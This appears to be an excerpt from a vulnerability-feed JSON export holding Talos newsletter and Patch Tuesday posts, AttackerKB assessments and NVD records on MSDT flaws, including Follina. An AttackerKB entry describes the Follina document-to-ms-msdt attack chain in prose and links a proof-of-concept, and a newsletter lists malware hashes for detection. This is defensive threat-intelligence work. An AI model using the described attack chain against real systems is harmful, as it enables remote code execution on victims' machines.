{"talosblog": [{"lastseen": "2022-08-11T18:12:01", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLGV0qm1JxU91RjdxVIuHS5qpDp6eR5oqC3GXE4GKh74vcE6eErdX-odGGmldK4seEV08PmWVUMwC9eHiY-MNvEWPJqq7kEe3k9gjAfn0ai-JRQnZ3GdRiAki_wed_Ctz2-MbeTD591fAVRErXhYumK3_GFcUGqEBUmnA_aeVfgK2rZKQ7AW0eYUiY/s2000/threat-source-newsletter.jpg>)\n\n_By Jon Munshaw. _\n\n[](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>)\n\nWelcome to this week\u2019s edition of the Threat Source newsletter. \n\n \n\n\nEveryone seems to want to create the next \u201cNetflix\u201d of something. Xbox\u2019s Game Pass is the [\u201cNetflix of video games.\u201d](<https://www.techradar.com/news/xbox-game-pass-is-taking-a-feature-from-netflix>) Rent the Runway is a [\u201cNetflix of fashion\u201d](<https://www.huffpost.com/entry/netflix-for-fashion-my-ex_b_9630844>) where customers subscribe to a rotation of fancy clothes. \n\n \n\n\nAnd now threat actors are looking to be the \u201cNetflix of malware.\u201d All categories of malware have some sort of \"[as-a-service](<https://www.itgovernance.co.uk/cyber-security-as-a-service>)\" twist now. Some of the largest ransomware groups in the world [operate \u201cas a service,\u201d](<https://blog.talosintelligence.com/2021/06/talos-takes-ep-57-ransomware-as-service.html>) allowing smaller groups to pay a fee in exchange for using the larger group\u2019s tools. \n\n \n\n\nOur [latest report](<https://talosintelligence.com/resources/488>) on information-stealers points out that \u201cinfostealers as-a-service\" are growing in popularity, and our researchers also discovered a [new \u201cC2 as-a-service\" platform](<https://blog.talosintelligence.com/2022/08/dark-utilities.html>) where attackers can pay to have this third-party site act as their command and control. And like Netflix, this Dark Utilities site offers several other layers of tools and malware to choose from. This is a particularly scary trend to me because of how easy \u2014 relatively speaking \u2014 this makes things for anyone with a basic knowledge of computers to carry out a cyber attack. Netflix made it easy for people like my Grandma to find everything she needs in one place to watch anything from throwback shows like \u201cNight Rider\u201d to the live action of \u201cShrek: The Musical\u201d and everything in between. \n\n \n\n\nHow much longer before anyone with access to the internet can log into a singular dark web site and surf for whatever they\u2019re in the mood for that day? As someone who has spent zero time on the actual dark web, this may already exist and I don\u2019t even know about it, but maybe a threat actor will one day be smart enough to make a website that looks as sleek as Netflix so you can scroll through suggestions and hand-pick the Redline information-stealer followed up by a relaxing evening of ransomware from Conti. \n\n \n\n\nWith everything going \u201cas a service\u201d it means I don\u2019t necessarily have to have the coding skills to create my own bespoke malware. So long as I have the cash, I could conceivably buy an out-of-the-box tool online and deploy it against whoever I want. \n\n \n\n\nThis is not necessarily as easy as picking a show on Netflix. But it\u2019s not a huge leap to look at the skills gap Netflix closes by allowing my Grandma to surf for any show she wants without having to scroll through cable channels or drive to the library to check out a DVD, and someone who knows how to use PowerShell being able to launch an \u201cas-a-service\" ransomware attack. \n\n \n\n\nI have no idea what the easy solution is here aside from all the traditional forms of detection and prevention we preach. Outside of direct law enforcement intervention, there are few ways to take these \u201cas a service\u201d platforms offline. Maybe that just means we need to start working on the \u201cNetflix of cybersecurity tools.\u201d \n\n\n \n\n## The one big thing \n\n> \n\n\nHistorically, cybercrime was considered white-collar criminal behavior perpetrated by those that were knowledgeable and turned bad. Now, technology has become such an integral part of our lives that [anyone with a smartphone and desire can get started in cybercrime](<https://blog.talosintelligence.com/2022/08/smalltime-cybercrime.html>). The growth of cryptocurrencies and associated anonymity, whether legitimate or not, has garnered the attention of criminals that formerly operated in traditional criminal enterprises and have now shifted to cybercrime and identity theft. New research from Talos indicates that small-time criminals are increasingly taking part in online crime like phishing, credit card scams and more in favor of traditional \u201chands-on\u201d crime. \n\n\n> ### Why do I care? \n> \n> Everyone panics when the local news shows a graph with \u201cviolent crime\u201d increasing in our respective areas. So we should be just as worried about the increase in cybercrime over the past few years, and the potential for it to grow. As mentioned above, \u201cas a service\u201d malware offerings have made it easier for anyone with internet access to carry out a cyber attack and deploy ransomware or just try to scam someone out of a few thousand dollars. \n> \n> ### So now what? \n> \n> Law enforcement, especially at the local level, is going to need to evolve along with the criminals as they are tasked with protecting the general public. The future criminal is going to be aware of operational security and technologies like Tor to make their arrests increasingly difficult. This is just as good a time as any to remember to talk to your family about cybersecurity and internet safety. Remind family members about common types of scams like the classic \u201cI\u2019m in the hospital and need money.\u201d \n\n> \n> \n\n## Other news of note\n\n \n\n\nMicrosoft Patch Tuesday was headlined by another zero-day vulnerability in the Microsoft Support Diagnostics Tool (MSDT). CVE-2022-35743 and CVE-2022-34713 are remote code execution vulnerabilities in MSDT. However, only CVE-2022-34713 has been exploited in the wild and Microsoft considers it \u201cmore likely\u201d to be exploited. MSDT was already the target of the so-called \u201cFollina\u201d zero-day vulnerability in June. In all, Microsoft patched more than 120 vulnerabilities across all its products. Adobe also released updates to fix 25 vulnerabilities on Tuesday, mainly in Adobe Acrobat Reader. One critical vulnerability could lead to arbitrary code execution and memory leak. ([Talos blog](<https://blog.talosintelligence.com/2022/08/microsoft-patch-tuesday-for-august-2022.html>), [Krebs on Security](<https://krebsonsecurity.com/2022/08/microsoft-patch-tuesday-august-2022-edition/>), [SecurityWeek](<https://www.securityweek.com/adobe-patch-tuesday-code-execution-flaws-acrobat-reader>)) \n\nSome of the U.K.\u2019s 111 services were disrupted earlier this week after a suspected cyber attack against its managed service provider. The country\u2019s National Health System warned residents that some emergency calls could be delayed and others could not schedule health appointments. Advance, the target of the attack, said it was investigating the potential theft of patient data. As of Thursday morning, at least nine NHS mental health trusts could face up to three weeks without access to vulnerable patients\u2019 records, though the incident has been \u201ccontained.\u201d ([SC Magazine](<https://www.scmagazine.com/analysis/business-continuity/cyberattack-disrupts-emergency-services-in-uk-drives-calls-for-healthcare-continuity>), [Bloomberg](<https://www.bloomberg.com/news/articles/2022-08-06/cyber-attack-disrupts-nhs-111-emergency-line-in-uk-telegraph#xj4y7vzkg>), [The Guardian](<https://www.theguardian.com/society/2022/aug/11/fears-patient-data-ransomware-attack-nhs-software-supplier>)) \n\nAn 18-year-old and her mother are facing charges in Nebraska over an alleged medicated abortion based on information obtained from Facebook messages. Court records indicate state law enforcement submitted a search warrant to Meta, the parent company of Facebook, demanding all private data, including messages, that the company had for the two people charged. The contents of those messages were then used as the basis of a second search warrant, in which additional computers and devices were confiscated. Although the investigation began before the U.S. Supreme Court\u2019s reversal of Roe v. Wade, the case highlights a renewed focus on digital privacy and data storage. ([Vice](<https://www.vice.com/en/article/n7zevd/this-is-the-data-facebook-gave-police-to-prosecute-a-teenager-for-abortion>), [CNN](<https://www.cnn.com/2022/08/10/tech/teen-charged-abortion-facebook-messages/index.html>)) \n\n## Can\u2019t get enough Talos? \n\n * * _[DarkReading News Desk at BlackHat](<https://youtu.be/L8wum8NuJAM?t=12719>)_\n * _[Talos Takes Ep. #107: Infostealers 101](<https://talosintelligence.com/podcasts/shows/talos_takes/episodes/107>)_\n * _[Threat Roundup for July 29 - Aug. 5](<https://blog.talosintelligence.com/2022/08/threat-roundup-0729-0805.html>)_\n * _[How cybercrime is going small time](<https://www.protocol.com/sponsored-content/how-cybercrime-is-going-small-time>)_\n * _[Dark Utilities C2 service gains traction among threat actors](<https://www.scmagazine.com/brief/threat-intelligence/dark-utilities-c2-service-gains-traction-among-threat-actors>)_\n\n \n\n\n## Upcoming events where you can find Talos \n\n \n\n\n**[USENIX Security '22](<https://www.usenix.org/conference/usenixsecurity22#registration>) (Aug. 10 - 12, 2022) **\n\nLas Vegas, Nevada \n\n**_ \n_**\n\n**[DEF CON](<https://defcon.org/>) (Aug. 11 - 14, 2022) **\n\nLas Vegas, Nevada \n\n**_ \n_**\n\n**[Security Insights 101 Knowledge Series](<https://aavar.org/securityinsights101/>) (Aug. 25, 2022) **\n\nVirtual \n\n## Most prevalent malware files from Talos telemetry over the past week \n\n** \n**\n\n**SHA 256: **[e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934](<https://www.virustotal.com/gui/file/e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934/details>)** \n****MD5: **93fefc3e88ffb78abb36365fa5cf857c ** \n****Typical Filename: **Wextract \n**Claimed Product: **Internet Explorer \n**Detection Name: **PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg \n\n \n\n\n**SHA 256: **[125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645](<https://www.virustotal.com/gui/file/125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645/details>) ** **\n\n**MD5: **2c8ea737a232fd03ab80db672d50a17a \n\n**Typical Filename:** LwssPlayer.scr \n\n**Claimed Product: **\u68a6\u60f3\u4e4b\u5dc5\u5e7b\u706f\u64ad\u653e\u5668 \n\n**Detection Name: **Auto.125E12.241442.in02 \n\n \n\n\n**SHA 256: **[e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c](<https://www.virustotal.com/gui/file/e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c/details>) ** **\n\n**MD5:** a087b2e6ec57b08c0d0750c60f96a74c \n\n**Typical Filename: **AAct.exe ** **\n\n**Claimed Product:** N/A ** **\n\n**Detection Name: **PUA.Win.Tool.Kmsauto::1201** **\n\n \n\n\n**SHA 256: **[c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0](<https://www.virustotal.com/gui/file/c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0/details>)** **\n\n**MD5: **8c69830a50fb85d8a794fa46643493b2** **\n\n**Typical Filename: **AAct.exe** **\n\n**Claimed Product: **N/A \n\n**Detection Name: **PUA.Win.Dropper.Generic::1201 \n\n** \n**\n\n**SHA 256: **[168e625c7eb51720f5ce1922aec6ad316b3aaca838bd864ee2bcdbd9b66171d0](<https://www.virustotal.com/gui/file/168e625c7eb51720f5ce1922aec6ad316b3aaca838bd864ee2bcdbd9b66171d0/details>) ** **\n\n**MD5: **311d64e4892f75019ee257b8377c723e \n\n**Typical Filename: **ultrasurf-21-32.exe \n\n**Claimed Product: **N/A** **\n\n**Detection Name: **W32.DFC.MalParent", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-11T18:00:00", "type": "talosblog", "title": "Threat Source newsletter (Aug. 11, 2022) \u2014 All of the things-as-a-service", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-34713", "CVE-2022-35743"], "modified": "2022-08-11T18:00:00", "id": "TALOSBLOG:A956D5C24762AE2DD21C63305475F8AB", "href": "http://blog.talosintelligence.com/2022/08/threat-source-newsletter-aug-11-2022.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-02T23:58:44", "description": "A recently discovered zero-day vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT) made headlines over the past few days. CVE-2022-30190, also known under the name \"Follina,\" exists when MSDT is called using the URL protocol from an application, such as Microsoft Office, Microsoft... \n \n[[ This is only the beginning! Please visit the blog for the complete entry ]]", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T14:53:52", "type": "talosblog", "title": "Threat Advisory: Zero-day vulnerability in Microsoft diagnostic tool MSDT could lead to code execution", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-02T14:53:52", "id": "TALOSBLOG:DE5281D9A4A03E4FA1F2A0B62B527489", "href": "http://blog.talosintelligence.com/2022/06/msdt-follina-coverage.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T16:58:32", "description": "[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIxoLWRMhadA-_KYScFgU4r2bphbJQie1KMf5HidfCLhMK1eYN333LxM5v_EiExr0ojMt17sBFFPh4XhavE7u02EWHwd-vEkfU45UgMTDaBEdUUf9mR6_ZRuaGkrOXoRMEBSmlFYTE1F8n0wrdRBy8pN7IFwoy1K7YHKYUTnGyiWeAxLeWfSTa2rCc/s1001/patch%20tuesday.jpg>)\n\n \n_ \n_\n\n_By Jon Munshaw and Vanja Svajcer._\n\nMicrosoft released its monthly security update Tuesday, disclosing more than 120 vulnerabilities across its line of products and software, the most in a single Patch Tuesday [in four months](<https://blog.talosintelligence.com/2022/04/microsoft-patch-tuesday-includes-most.html>). \n\nThis batch of updates also includes a fix for a new vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT) that\u2019s actively being exploited in the wild, according to Microsoft. MSDT was already the target of the so-called [\u201cFollina\u201d zero-day vulnerability](<https://blog.talosintelligence.com/2022/06/msdt-follina-coverage.html>) in June. \n\nIn all, August\u2019s Patch Tuesday includes 15 critical vulnerabilities and a single low- and moderate-severity issue. The remainder is classified as \u201cimportant.\u201d \n\nTwo of the important vulnerabilities [CVE-2022-35743](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35743>) and [CVE-2022-34713](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34713>) are remote code execution vulnerabilities in MSDT. However, only CVE-2022-34713 has been exploited in the wild and Microsoft considers it \u201cmore likely\u201d to be exploited. \n\nMicrosoft Exchange Server contains two critical elevation of privilege vulnerabilities, [CVE-2022-21980](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21980>) and [CVE-2022-24477](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-24477>). An attacker could exploit this vulnerability by tricking a target into visiting a malicious, attacker-hosted server or website. In addition to applying the patch released today, potentially affected users should enable Extended Protection on vulnerable versions of the server. \n\nThe Windows Point-to-Point Tunneling Protocol is also vulnerable to three critical vulnerabilities. Two of them, [CVE-2022-35744](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35744>) and [CVE-2022-30133](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30133>), could allow an attacker to execute remote code on an RAS server machine. The other, [CVE-2022-35747](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35747>), could lead to a denial-of-service condition. CVE-2022-35744 has a CVSS severity score of 9.8 out of 10, one of the highest-rated vulnerabilities this month. An attacker could exploit these vulnerabilities by communicating via Port 1723. Affected users can render these issues unexploitable by blocking that port, though it runs the risk of disrupting other legitimate communications. \n\nAnother critical code execution vulnerability, [CVE-2022-35804](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35804>), affects the SMB Client and Server and the way the protocol handles specific requests. An attacker could exploit this on the SMB Client by configuring a malicious SMBv3 server and tricking a user into connecting to it through a phishing link. It could also be exploited in the Server by sending specially crafted packets to the server. \n\nMicrosoft recommended that users block access to Port 445 to protect against the exploitation of CVE-2022-35804. However, only certain versions of Windows 11 are vulnerable to this issue. \n\nTalos would also like to highlight eight important vulnerabilities that Microsoft considers to be \u201cmore likely\u201d to be exploited: \n\n * [CVE-2022-34699](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34699>): Win32k elevation of privilege vulnerability \n * [CVE-2022-35748](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35748>): HTTP.sys denial-of-service vulnerability \n * [CVE-2022-35750](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35750>): Win32k elevation of privilege vulnerability \n * [CVE-2022-35751](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35751>): Windows Hyper-V elevation of privilege vulnerability \n * [CVE-2022-35755](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35755>): Windows print spooler elevation of privilege vulnerability \n * [CVE-2022-35756](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35756>): Windows Kerberos elevation of privilege vulnerability \n * [CVE-2022-35761](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35761>): Windows Kernel elevation of privilege vulnerability \n * [CVE-2022-35793](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35793>): Windows Print Spooler elevation of privilege vulnerability \n\nA complete list of all the vulnerabilities Microsoft disclosed this month is available on its [update page](<https://portal.msrc.microsoft.com/en-us/security-guidance>). \n\nIn response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. \n\nThe rules included in this release that protect against the exploitation of many of these vulnerabilities are 60371 - 60380, 60382 - 60384, 60386 and 60387. There are also Snort 3 rules 300233 - 300239.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T20:44:00", "type": "talosblog", "title": "Microsoft Patch Tuesday for August 2022 \u2014 Snort rules and prominent vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-21980", "CVE-2022-24477", "CVE-2022-30133", "CVE-2022-34699", "CVE-2022-34713", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35747", "CVE-2022-35748", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35755", "CVE-2022-35756", "CVE-2022-35761", "CVE-2022-35793", "CVE-2022-35804"], "modified": "2022-08-10T15:09:15", "id": "TALOSBLOG:E9524F807CE78585C607B458809D0AD7", "href": "http://blog.talosintelligence.com/2022/08/microsoft-patch-tuesday-for-august-2022.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "attackerkb": [{"lastseen": "2023-01-31T14:39:22", "description": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-35743.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "attackerkb", "title": "CVE-2022-34713", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-34713", "CVE-2022-35743"], "modified": "2022-08-09T00:00:00", "id": "AKB:06DA4012-8C8E-4534-A099-AE4F2449F9B3", "href": "https://attackerkb.com/topics/B3Zx5VDSPc/cve-2022-34713", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-27T07:58:25", "description": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\n \n**Recent assessments:** \n \n**bwatters-r7** at May 31, 2022 12:56pm UTC reported:\n\nEDIT: This was a quick description, and while it is still accurate as far as I know, A Rapid7 Evaluation with greater analysis has been published here: <https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190/rapid7-analysis>\n\nThis is a relatively new vulnerability in the Microsoft Support Diagnostic Tool Vulnerability, so it is likely more information will come out in the coming days. \nCurrently, as seen in the wild, this vulnerability is embedded in a word document and likely distributed with a *.rar file. When the Word document is opened, it reaches out and downloads an HTML file which has a JS section to implement the ms-msdt (Microsoft Support Diagnostic Tool Vulnerability) protocol which is then coerced into launching a command. \nAs reported by Jake Williams in a thread here: <https://twitter.com/MalwareJake/status/1531019243411623939>, the command opens the accomplanying `*.rar` file and pulls a base64 encoded `*.cab` file from it, then expands the *cab file and runs a file contained in the cab file called `rgb.exe` THIS FILENAME IS LIKELY MUTABLE, SO I DO NOT RECCOMMEND POLICING FOR IT WITHOUT OTHER RULES. \nMicrosoft has already published mitigation techniques for this exploit: <https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/> \nUsers are required to delete a single registry key called `HKEY_CLASSES_ROOT\\ms-msdt` though there is little discussion about the side effects of this operation. In his thread, Jake Williams has verified that the removal of this key prevents execution of the embedded payload. \nFurther reading: \n<https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e> \nUntested and unverified PoC: <https://github.com/chvancooten/follina.py/blob/main/follina.py> \n<https://www.scythe.io/library/breaking-follina-msdt-vulnerability>\n\nUPDATE: I adjusted the attacker value up in light of reports by Kevin Beaumont that if the attacker uses an RTF file as the host, then the exploit code will run just viewing the file in the preview pane with explorer.exe. (details here: <https://github.com/JMousqueton/PoC-CVE-2022-30190> and the above doublepulsar blog post)\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "attackerkb", "title": "CVE-2022-30190", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444", "CVE-2022-30190"], "modified": "2022-06-02T00:00:00", "id": "AKB:1FA9A53C-0452-4411-96C9-C0DD833F8D18", "href": "https://attackerkb.com/topics/Z0pUwH0BFV/cve-2022-30190", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-08-15T21:09:17", "description": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-35743.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-09T20:15:00", "type": "cve", "title": "CVE-2022-34713", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-34713", "CVE-2022-35743"], "modified": "2022-08-12T17:32:00", "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_11:-", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:21h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_10:-"], "id": "CVE-2022-34713", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-34713", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*"]}, {"lastseen": "2022-06-07T20:25:09", "description": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T20:15:00", "type": "cve", "title": "CVE-2022-30190", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-07T18:15:00", "cpe": ["cpe:/o:microsoft:windows_10:21h1", 